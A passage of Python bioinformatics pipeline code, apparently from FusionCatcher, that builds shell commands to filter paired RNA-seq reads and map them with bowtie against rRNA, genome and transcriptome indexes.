job.add('-L',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file='yes') #job.add('',outdir('reads_b2n2a.fq'),kind='input',temp_path=temp_flag) job.add('-',kind='parameter') #job.add('>',outdir('reads_no-shorts.fq'),kind='output') if (not options.all_reads_junction) and (not options.skip_interleave_processing): job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('dropse',kind='parameter') job.add('-',kind='parameter') job.add('>',outdir('reads_acgt.fq'),kind='output') job.run() #convert ambiguous nucleotides to As #job.add('fastq2acgt.py',kind='program') #job.add('--input',outdir('reads_b2n.fq'),kind='input',temp_path=temp_flag) #job.add('--output',outdir('reads_b2n2a.fq'),kind='output') #job.run() if pigz: job.add(_PZ_+'pigz',kind='program') job.add('-p',options.processes,kind='parameter',checksum='no') else: job.add('gzip',kind='program') job.add('--fast',kind='parameter') job.add('-c',outdir('originala.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('originala.fq.gz'),kind='output') job.run() # remove reads shorter than a given threshold # job.add('remove_shorter_reads.py',kind='program') # job.add('--input',outdir('reads_b2n2a.fq'),kind='input',temp_path=temp_flag) # job.add('--threshold',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file='yes') # job.add('--output',outdir('reads_no-shorts.fq'),kind='output') # job.run() # job.add('seqtk',kind='program') # job.add('seq',kind='parameter') # job.add('-L',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file='yes') # job.add('',outdir('reads_b2n2a.fq'),kind='input',temp_path=temp_flag) # job.add('>',outdir('reads_no-shorts.fq'),kind='output') # job.run() # remove the reads which do not form a pair ## if (not options.all_reads_junction) and (not options.skip_interleave_processing): # assumption all reads are interleaved # job.add('remove_single_reads.py',kind='program') # job.add('--input',outdir('reads_no-shorts.fq'),kind='input',temp_path=temp_flag) # job.add('--interleaved',kind='parameter') # job.add('--output',outdir('reads_acgt.fq'),kind='output') # job.add('--log',outdir('log_reads2_removed.txt'),kind='output') # job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') # job.add('--processes',options.processes,kind='parameter',checksum='no') # job.add('2>',outdir('log_removed_single_reads1.txt'),kind='parameter',checksum='no') # job.run() # job.add('cat',kind='program') # job.add('',outdir('reads_no-shorts.fq'),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # job.add('paste','- - - -',kind='parameter') # job.add('|',kind='parameter') # job.add('awk',kind='parameter') # job.add('-F"\\\\t"',kind='parameter') # job.add("""'{ n=length($1); if (olde=="/1" && substr($1,0,n-1)==old && substr($1,n-1,2)=="/2") {print old1"\\n"old2"\\n+\\n"old3"\\n"$1"\\n"$2"\\n+\\n"$4; old=""; count++} {old=substr($1,0,n-1); olde=substr($1,n-1,2); old1=$1; old2=$2; old3=$4}} END{print NR-2*count > "%s"}'""" % (outdir('log_removed_single_reads1.txt'),),kind='parameter') # job.add('',outdir('log_removed_single_reads1.txt'),kind='output',command_line='no') # job.add('>',outdir('reads_acgt.fq'),kind='output') # job.run() ## job.add('seqtk',kind='program') ## job.add('dropse',kind='parameter') ## job.add('',outdir('reads_no-shorts.fq'),kind='input',temp_path=temp_flag) ## job.add('>',outdir('reads_acgt.fq'),kind='output') ## job.run() # job.add('printf',kind='program') # job.add(('"\n\nCount of short reads removed due to missing their mate read:\n'+ # 
'-----------------------------------------------------------------\n"'),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_removed_single_reads1.txt'),kind='input',temp_path=temp_flag) # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() ## else: ## job.link(outdir('reads_no-shorts.fq'),outdir('reads_acgt.fq'),temp_path=temp_flag) job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_acgt.fq'),kind='input') job.add('|',kind='parameter') job.add("echo $((`wc -l`/4))",kind='parameter') job.add('>>',outdir('log_removed_single_reads1.txt'),kind='output') job.run() info(job, fromfile = outdir('log_removed_single_reads1.txt'), tofile = info_file, top = ["\n\nCount of all short reads after removing reads due to missing their mate read:", "-----------------------------------------------------------------------------"], bottom = "\n\n\n") if job.iff(empty(outdir('reads_acgt.fq')),id = "#reads_acgt.fq#"): t = ["ERROR: Too many reads have been removed during the pre-filtering steps!", "Please, check that the input files are from a RNA-seq dataset with paired reads", "or that the input files are given correctly!", "Please, check also that the input reads have the same length!" ] t = '\n'.join(t)+'\n' print >>sys.stderr, t file(info_file,'a').write(t) file(log_file,'a').write(t) job.clean(outdir('original.fq'),temp_path=temp_flag) job.clean(outdir('origi.fq'),temp_path=temp_flag) job.clean(outdir('original.fq.gz'),temp_path=temp_flag) job.clean(outdir('originala.fq'),temp_path=temp_flag) job.clean(outdir('originala.fq.gz'),temp_path=temp_flag) job.clean(outdir('log_lengths_original_reads.txt'),temp_path=temp_flag) job.clean(outdir('log_lengths_original_reads_plus.txt'),temp_path=temp_flag) job.clean(outdir('log_lengths_original_reads_final.txt'),temp_path=temp_flag) # job.clean(outdir('log_lengths_reads.txt'),temp_path=temp_flag) job.clean(outdir('log_removed_single_reads1.txt'),temp_path=temp_flag) job.clean(outdir('log_minimum_length_short_read.txt'),temp_path=temp_flag) job.clean(outdir('reads_acgt.fq'),temp_path=temp_flag) job.close() sys.exit(1) no_reads = 0 if os.path.isfile(outdir('log_removed_single_reads1.txt')): no_reads = int(float(file(outdir('log_removed_single_reads1.txt'),'r').readline().strip())) #### #### if not options.skip_automatic_scaling: if max_len_reads and max_len_reads < 60: options.skip_bowtie2 = True # options.skip_bwa = True options.skip_star_bowtie = True if not is_optparse_provided(parser,'limit_star'): options.limit_star = int(2.7 * (2**30)) job.add('printf',kind='program') job.add(('"\nInput reads are too short (maximum found length is %d) and therefore the BOWTIE2 method is disabled automatically!\n"') % (max_len_reads,),kind='parameter') job.add('>>',info_file,kind='output') job.run() if (not is_optparse_provided(parser,'mismatches_psl')) and (not is_optparse_provided(parser,'trim_psl_3end_keep')): if max_len_reads > 109: options.trim_psl_3end_keep = max_len_reads - 20 options.mismatches_psl = int(math.ceil(float(options.trim_psl_3end_keep)/50)) job.add('printf',kind='program') job.add('"\nAdjusted automatically trim_psl_3end_keep and mismatches_psl (%d,%d) because reads of maximum length of %d bp were found!\n\n"' % (options.trim_psl_3end_keep,options.mismatches_psl,max_len_reads),kind='parameter') job.add('>>',info_file,kind='output')
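# note: the adjustment above allows roughly one BLAT/PSL mismatch per 50 bp
# of the kept read, i.e. mismatches_psl = ceil(trim_psl_3end_keep / 50),
# after shaving 20 bp off reads longer than 109 bp.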
job.run() # if no_reads and max_len_reads > 60 and no_reads < 35000000 and (not is_optparse_provided(parser,'aligners')): # options.skip_bowtie2 = False # job.add('printf',kind='program') # job.add('"\nEnabled automatically Bowtie2 aligner!\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() if (no_reads and (not is_optparse_provided(parser,'spanning_pairs')) and (not is_optparse_provided(parser,'spanning_reads')) and (not is_optparse_provided(parser,'length_anchor')) and # (not options.sensitive) and # (not options.mildly_sensitive) and # (not options.highly_sensitive) and (not options.paranoid_sensitive)): if no_reads < 35000000 and no_reads >= 15000000 and max_len_reads < 60: spanning_pairs_bowtie = 3 spanning_pairs_minimum = min([spanning_pairs_bowtie,spanning_pairs_blat,spanning_pairs_star,spanning_pairs_bowtie2,spanning_pairs_spotlight]) spanning_reads_bowtie = 2 spanning_reads_minimum = min([spanning_reads_bowtie,spanning_reads_blat,spanning_reads_star,spanning_reads_bowtie2,spanning_reads_spotlight]) length_anchor_bowtie = 14 length_anchor_minimum = min([length_anchor_bowtie,length_anchor_bowtie2,length_anchor_star,length_anchor_blat,length_anchor_spotlight]) job.add('printf',kind='program') job.add('"\nAdjusted automatically spanning_pairs, spanning_reads, and length_anchor (%d,%d,%d,%d) for read counts in [15000000,35000000) and reads shorter than 60 bp.\n\n"' % (spanning_pairs_bowtie,spanning_reads_bowtie,length_anchor_bowtie,length_anchor_spotlight),kind='parameter') job.add('>>',info_file,kind='output') job.run() elif no_reads < 15000000 and no_reads >= 2 and max_len_reads < 75: spanning_pairs_bowtie = 2 spanning_pairs_minimum = min([spanning_pairs_bowtie,spanning_pairs_blat,spanning_pairs_star,spanning_pairs_bowtie2,spanning_pairs_spotlight]) spanning_reads_bowtie = 2 spanning_reads_minimum = min([spanning_reads_bowtie,spanning_reads_blat,spanning_reads_star,spanning_reads_bowtie2,spanning_reads_spotlight]) length_anchor_bowtie = 13 length_anchor_minimum = min([length_anchor_bowtie,length_anchor_bowtie2,length_anchor_star,length_anchor_blat,length_anchor_spotlight]) job.add('printf',kind='program') job.add('"\nAdjusted automatically spanning_pairs, spanning_reads, and length_anchor (%d,%d,%d,%d) for read counts in [2,15000000) and reads shorter than 75 bp.\n\n"' % (spanning_pairs_bowtie,spanning_reads_bowtie,length_anchor_bowtie,length_anchor_spotlight),kind='parameter') job.add('>>',info_file,kind='output') job.run() elif no_reads < 35000000 and no_reads >= 2 and max_len_reads > 74: spanning_pairs_bowtie = 2 spanning_pairs_minimum = min([spanning_pairs_bowtie,spanning_pairs_blat,spanning_pairs_star,spanning_pairs_bowtie2,spanning_pairs_spotlight]) spanning_reads_bowtie = 2 spanning_reads_minimum = min([spanning_reads_bowtie,spanning_reads_blat,spanning_reads_star,spanning_reads_bowtie2,spanning_reads_spotlight]) job.add('printf',kind='program') job.add('"\nAdjusted automatically spanning_pairs, spanning_reads, and length_anchor (%d,%d,%d,%d) for read counts in [2,35000000) and reads longer than 74 bp.\n\n"' % (spanning_pairs_bowtie,spanning_reads_bowtie,length_anchor_bowtie,length_anchor_spotlight),kind='parameter') job.add('>>',info_file,kind='output') job.run() #### #### if job.run(): if (2 * length_anchor_minimum) > len_reads - 1: job.write(["ERROR: The length of the anchor (i.e. %s) is too long compared to the length of the reads (i.e.
%d )" % (options.length_anchor,len_reads), "Suggestion 1: Decrease the length of the anchor using '--anchor-fusion' option if possible!", "Suggestion 2: Decrease the size of the trimming using '--5end' or '--5keep' option if possible!", ], stdout = True, stderr = True, log = True) job.close() sys.exit(1) # if job.iff(not empty(outdir('log_reads2_removed.txt')),id = "#log_reads2_removed.txt#"): # r = float(file(outdir('log_reads2_removed.txt'),'r').readline()) # if r > 0.7: # t = ["ERROR: Too many reads (that is %.3f%%) have been removed because they miss theirs read-mates!" % (r,), # "Please, check that the input files are from a RNA-seq dataset with pair-reads or that the input files are given correctly!" # ] # t = '\n'.join(t)+'\n' # print >>sys.stderr, t # file(info_file,'a').write(t) # file(log_file,'a').write(t) # job.close() # sys.exit(1) # job.clean(outdir('log_reads2_removed.txt'),temp_path=temp_flag) ############################################################################## # FILTERING - ribosomal DNA + mitochondrion ############################################################################## # find available memory job.add('printf',kind='program') job.add('"\n============\nMEMORY (before using BOWTIE):\n============\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('free',kind='program') job.add('-m',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\n\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() # map using the filter index (not aligned, unique alignment, multiple alignments) job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') #job.add('-v',options.filter_mismatches,kind='parameter') #options.mismatches job.add('--seedmms','1',kind='parameter') # options.mismatches job.add('--seedlen',options.trim_3end_keep,kind='parameter') job.add('--trim5','7',kind='parameter') # trim the 10 #job.add('-v','1',kind='parameter') #options.mismatches job.add('-p',options.processes,kind='parameter',checksum='no') #job.add('-m','1',kind='parameter') job.add('-k','1',kind='parameter') #job.add('--solexa1.3-quals',kind='parameter') job.add('--phred33-quals',kind='parameter') #job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') #job.add('--best',kind='parameter') #job.add('--strata',kind='parameter') # if len_reads > 40 and options.trim_wiggle: # job.add('--trim3',options.trim_wiggle,kind='parameter') # trim on the fly 5bp from 3' end # job.add('--trim5',options.trim_wiggle,kind='parameter') # trim the 5 # job.add('--suppress','1,2,3,4,5,6,7,8',kind='parameter') job.add('--un',outdir('reads-filtered_temp.fq'),kind='output') # here is the result job.add('--max',outdir('reads-filtered_temp_multiple.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if options.skip_mitochondrion_filtering: if os.path.isfile(datadir('rtrna_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('rtrna_index/'),kind='input') else: if os.path.isfile(datadir('rtrna_hla_mt_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('rtrna_hla_mt_index/'),kind='input') job.add('',outdir('reads_acgt.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads-filtered.map'),kind='output',temp_path=temp_flag) # 
job.add('','/dev/null',kind='parameter') job.add('2>',outdir('log_bowtie_reads-filtered-out.stdout.txt'),kind='output',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') job.run() info(job, fromfile = outdir('log_bowtie_reads-filtered-out.stdout.txt'), tofile = info_file, top = ["Mapping all input reads on rRNA and/or MT for filtering purposes:", "----------------------------------------------------------------"], bottom = "\n\n\n", temp_path = temp_flag) # job.add('printf',kind='program') # job.add(('"\n\nMapping all input reads on rRNA and/or MT for filtering purposes:\n'+ # '-----------------------------------------------\n"'),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_bowtie_reads-filtered-out.stdout.txt'),kind='input',temp_path=temp_flag) # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # remove the reads which map on PHIX174 which is used for improving the quality of Illumina NGS #job.link(outdir('reads-filtered_temp.fq'),outdir('reads-filtered_temp-phix.fq'),temp_path=temp_flag) #job.link(outdir('reads-filtered_temp-phix.fq'),outdir('reads-filtered_temp-hla.fq'),temp_path=temp_flag) # remove the reads which do not form a pair if (not options.all_reads_junction) and (not options.skip_interleave_processing): # assumption all reads are not interleaved job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads-filtered_temp.fq'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('paste','- - - -',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') if parsort: job.add(_PL_+'parsort',kind='parameter') job.add('-k','1,1',kind='parameter') job.add('-t',"'\\\t'",kind='parameter') job.add('--parallel',options.processes,kind='parameter',checksum='no') if parsort_buffer_size: job.add('--buffer-size',parsort_buffer_size,kind='parameter',checksum='no') else: job.add('sort',kind='parameter') job.add('-k','1,1',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('"\\t"',kind='parameter') job.add('"\\n"',kind='parameter') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('dropse',kind='parameter') #job.add('-',kind='parameter') job.add('>',outdir('reads-filtered.fq'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads-filtered.fq'),kind='input') job.add('|',kind='parameter') job.add("echo $((`wc -l`/4))",kind='parameter') job.add('>>',outdir('log_removed_single_reads2.txt'),kind='output') job.run() # job.add('awk',kind='parameter') # job.add('-F"\\\\t"',kind='parameter') # job.add("""'{n=length($1); if (olde=="/1" && substr($1,0,n-1)==old && substr($1,n-1,2)=="/2") {print old1"\\n"old2"\\n+\\n"old3"\\n"$1"\\n"$2"\\n+\\n"$4; old=""; count++} 
{old=substr($1,0,n-1); olde=substr($1,n-1,2); old1=$1; old2=$2; old3=$4}} END {print NR-2*count > "%s"}'""" % (outdir('log_removed_single_reads2.txt'),),kind='parameter')
#    job.add('',outdir('log_removed_single_reads2.txt'),kind='output',command_line='no')
#    job.add('>',outdir('reads-filtered.fq'),kind='output')
#    job.run()

#    job.add('tr',kind='parameter')
#    job.add('"\\t"',kind='parameter')
#    job.add('"\\n"',kind='parameter')
#    job.add('|',kind='parameter')
#    job.add('remove_single_reads.py',kind='parameter')
#    ##job.add('--input',outdir('reads-filtered_temp-phix.fq'),kind='input',temp_path=temp_flag)
#    job.add('--interleaved',kind='parameter')
#    job.add('--input','-',kind='input')
#    job.add('--output',outdir('reads-filtered.fq'),kind='output')
#    job.add('--log',outdir('log_reads1_removed.txt'),kind='output')
#    job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no')
#    job.add('--processes',options.processes,kind='parameter',checksum='no')
#    job.add('2>',outdir('log_removed_single_reads2.txt'),kind='parameter',checksum='no')
#    job.run()

    info(job,
         fromfile = outdir('log_removed_single_reads2.txt'),
         tofile = info_file,
         top = ["\n\nCount of all short reads after removing reads due to missing their mate read:",
                "-----------------------------------------------------------------------------"],
         bottom = "\n\n\n",
         temp_path = temp_flag)

#    job.add('printf',kind='program')
#    job.add(('"\n\nCount of short reads removed due to missing their mate read:\n'+
#             '-----------------------------------------------------------------\n"'),kind='parameter')
#    job.add('>>',info_file,kind='output')
#    job.run()

#    job.add('cat',kind='program')
#    job.add('',outdir('log_removed_single_reads2.txt'),kind='input',temp_path=temp_flag)
#    job.add('>>',info_file,kind='output')
#    job.run()

#    job.add('printf',kind='program')
#    job.add('"\n\n\n"',kind='parameter')
#    job.add('>>',info_file,kind='output')
#    job.run()

else:
    job.link(outdir('reads-filtered_temp.fq'),outdir('reads-filtered.fq'),temp_path=temp_flag)

if job.run():
    if not empty(outdir('log_reads1_removed.txt')):
        r = float(file(outdir('log_reads1_removed.txt'),'r').readline())
        if r > 0.7:
            t = ["ERROR: Too many reads (that is %.3f%%) have been removed because they miss their read-mates!" % (r,),
                 "Please, check that the input files are from a RNA-seq dataset with pair-reads or that the input files are given correctly!"
                ]
            t = '\n'.join(t)+'\n'
            print >>sys.stderr, t
            file(info_file,'a').write(t)
            file(log_file,'a').write(t)
            job.close()
            sys.exit(1)

job.clean(outdir('log_reads1_removed.txt'),temp_path=temp_flag)

job.add('LC_ALL=C',kind='program')
job.add('cat',kind='parameter')
job.add('',outdir('reads-filtered.fq'),kind='input')
job.add('|',kind='parameter')
job.add("echo $((`wc -l`/4))",kind='parameter')
job.add('>',outdir('count_reads_left_after_filtering.txt'),kind='output')
job.run()

info(job,
     fromfile = outdir('count_reads_left_after_filtering.txt'),
     tofile = info_file,
     top = ["Total Read Counts (after all the filtering steps):",
            "---------------------------------------------------"],
     bottom = "\n\n\n")

#    job.add('printf',kind='program')
#    job.add(('"\nTotal Read Counts (after all the filtering steps):\n'+
#             '--------------------------------------------------\n"'),kind='parameter')
#    job.add('>>',info_file,kind='output')
#    job.run()

#    job.add('cat',kind='program')
#    job.add('',outdir('count_reads_left_after_filtering.txt'),kind='input')
#    job.add('>>',info_file,kind='output')
#    job.run()

#    job.add('printf',kind='program')
#    job.add('"\n\n\n"',kind='parameter')
#    job.add('>>',info_file,kind='output')
#    job.run()

if job.iff(empty(outdir('reads-filtered.fq')),id = "#reads-filtered.fq#"):
    t = ["ERROR: Too many reads have been removed during the pre-filtering steps!",
         "Please, check that the input files are from a RNA-seq dataset with pair-reads ",
         "or that the input files are given correctly!"
        ]
    t = '\n'.join(t)+'\n'
    print >>sys.stderr, t
    file(info_file,'a').write(t)
    file(log_file,'a').write(t)
    job.close()
    sys.exit(1)

if not options.skip_genome_filtering:
    ##############################################################################
    # MAPPING short reads against the genome
    ##############################################################################
    # map using the genome index (not aligned, unique alignment, multiple alignments); results in MAP BOWTIE format
    job.add(_BE_+'bowtie',kind='program')
    job.add('--seed',bowtie_seed,kind='parameter')
    job.add('-t',kind='parameter')
#    job.add('-q',kind='parameter')
#    job.add('-a',kind='parameter')
#    job.add('-k','2',kind='parameter')
    job.add('-k','200',kind='parameter')
#    job.add('-v','1',kind='parameter') # options.filter_mismatches # stjude
    job.add('-v','0',kind='parameter') # options.filter_mismatches # stjude
    job.add('-p',options.processes,kind='parameter',checksum='no')
    job.add('-m','20',kind='parameter')
#    job.add('-m','2',kind='parameter')
#    job.add('-k','1',kind='parameter')
    job.add('--suppress','5,6,7',kind='parameter')
#    job.add('--solexa1.3-quals',kind='parameter')
    job.add('--phred33-quals',kind='parameter')
    job.add('--best',kind='parameter')
    job.add('--strata',kind='parameter')
#    job.add('--tryhard',kind='parameter') # ??? really necessary?
stjude job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--un',outdir('reads_filtered_not-mapped-genome.fq'),kind='output') job.add('--max',outdir('reads-filtered_multiple-mappings-genome.fq'),kind='output') # if this is missing then these reads are going to '--un' if bowtie123: job.add('',datadir('genome_index2/index'),kind='input') else: if os.path.isfile(datadir('genome_index2','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('genome_index/'),kind='input') job.add('',outdir('reads-filtered.fq'),kind='input') job.add('',outdir('reads_filtered_genome.map'),kind='output') # <== best mappings on genome ####### job.add('2>',outdir('log_bowtie_reads_mapped-genome.stdout.txt'),kind='parameter',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') job.run() info(job, fromfile = outdir('log_bowtie_reads_mapped-genome.stdout.txt'), tofile = info_file, top = ["Mapping the filtered reads on genome:", "-------------------------------------"], bottom = "\n\n\n") # job.add('printf',kind='program') # job.add(('"\n\nMapping the filtered reads on genome:\n'+ # '-----------------------------------------------\n"'),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_bowtie_reads_mapped-genome.stdout.txt'),kind='input') # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # extract the names of the short reads which mapped on the genome job.add('LC_ALL=C',kind='program') job.add('cut',kind='parameter') job.add('-f','1',kind='parameter') job.add('',outdir('reads_filtered_genome.map'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('list-names-reads-filtered_genome.txt'),kind='output') job.run() if not options.split_seqtk_subseq: #extract the short reads which mapped on genome job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--input',outdir('reads-filtered.fq'),kind='input') job.add('--list',outdir('list-names-reads-filtered_genome.txt'),kind='input') job.add('--output',outdir('reads_filtered_unique-mapped-genome.fq'),kind='output') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.run(error_message = ("If this fails (again?) due to a memory error (e.g. not enough free memory) then lowering the "+ "buffer size for specifically this script might help. 
This can be done by using the FusionCatcher's "+ "command line option '--extra-buffer-size "+str(int(options.extract_buffer_size)/2)+"' .")) elif options.split_seqtk_subseq == 1: #extract the short reads which mapped on genome job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads-filtered.fq'),kind='input') job.add('',outdir('list-names-reads-filtered_genome.txt'),kind='input') job.add('>',outdir('reads_filtered_unique-mapped-genome.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) elif options.split_seqtk_subseq > 1: #extract the short reads which mapped on genome job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',outdir('reads-filtered.fq'),kind='input') job.add('',outdir('list-names-reads-filtered_genome.txt'),kind='input') job.add('',outdir('reads_filtered_unique-mapped-genome.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) job.clean(outdir('reads-filtered.fq'),temp_path=temp_flag) job.clean(outdir('list-names-reads-filtered_genome.txt'),temp_path=temp_flag) #IDEA # cat list-names-reads-filtered_genome.txt | gnu_parallel --part -k -j1 --block 10G seqtk subseq reads-filtered.fq - > reads_filtered_unique-mapped-genome.fq # sed 's/^/^@/g' ids.txt > aha.txt ; cat /apps/reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq | paste - - - - | /apps/tools/parallel-20140822/src/parallel --pipe --no-notice grep -f aha.txt - | tr "\t" "\n" > result.fq ############################################################################## # MAPPING short reads which do not map on genome against the transcriptome ############################################################################## if job.iff(empty(outdir('reads_filtered_not-mapped-genome.fq')),id = "#reads_filtered_not-mapped-genome.fq#"): # job.add('echo',kind='program') # job.add('-n','""',kind='parameter') # job.add('>',outdir('reads_filtered_not-mapped-genome_transcriptome.map'),kind='output') # job.run() job.add('touch',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome.map'),kind='output') job.run() job.add('printf',kind='program') job.add('"\nMapping on transcriptome the filtered reads which did not map on genome:\n------------------------------------------------------------------------\nNo reads and no alignments!\n\n\n"', kind='parameter') job.add('>>',log_file,kind='output') job.run() else: # map using the transcript index (not mapped, unique alignment, multiple alignments) job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','500',kind='parameter') job.add('-v',options.mismatches,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') 
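# For orientation only: the job.add() calls around this point assemble one bowtie
# command line which, with example values filled in for the option-driven fields,
# expands to approximately:
#
#   bowtie --seed 42 -t -k 500 -v 2 -p 8 --phred33-quals --suppress 5,6,7 \
#       --chunkmbs 128 --tryhard --best --strata \
#       --un reads_filtered_not-mapped-genome_not-mapped-transcriptome.fq \
#       --max reads_filtered_genome-transcriptome_multiple.fq \
#       transcripts_index/ reads_filtered_not-mapped-genome.fq \
#       reads_filtered_not-mapped-genome_transcriptome.map
#
# (42/2/8/128 are placeholders for bowtie_seed, options.mismatches,
# options.processes and options.chunkmbs; paths are relative to the output dir.)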
#job.add('--solexa1.3-quals',kind='parameter') job.add('--phred33-quals',kind='parameter') job.add('--suppress','5,6,7',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fq'),kind='output') # <== reads which do not map on transcriptome and genome! ####### job.add('--max',outdir('reads_filtered_genome-transcriptome_multiple.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome.fq'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome.map'),kind='output') job.add('2>',outdir('log_bowtie_reads_not-mapped-genome_but_mapped-transcriptome.stdout.txt'),kind='parameter',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') job.run() info(job, fromfile = outdir('log_bowtie_reads_not-mapped-genome_but_mapped-transcriptome.stdout.txt'), tofile = info_file, top = ["Mapping on transcriptome the filtered reads which did not map on genome:", "------------------------------------------------------------------------"], bottom = "\n\n\n") # # trim it more and get more pairs for candidate fusion genes # if (not is_optparse_provided(parser,'trim_3end_keep2')) and options.trim_3end_keep2 > 0 and options.trim_3end_keep2 < 25 and len_reads == 60: options.trim_3end_keep2 = 25 anchorx = options.trim_3end_keep2 avgx = int((len_reads - anchorx - options.trim_3end_keep2)/2) if options.trim_3end_keep2 > 0 and avgx > 0: # trim2 fqi = outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fq') if job.iff(not empty(fqi),id = "#reads_filtered_not-mapped-genome_not-mapped-transcriptome-trim2.fq#"): trim2_bowtie_k = '100' # '500' trim2_bowtie_try_hard = False fqo = outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_trim2_3end.fq') fmapo = outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map') job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k',trim2_bowtie_k,kind='parameter') job.add('-v','0',kind='parameter') job.add('--trim3',len_reads-options.trim_3end_keep2,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('--phred33-quals',kind='parameter') job.add('--suppress','5,6,7',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if trim2_bowtie_try_hard: 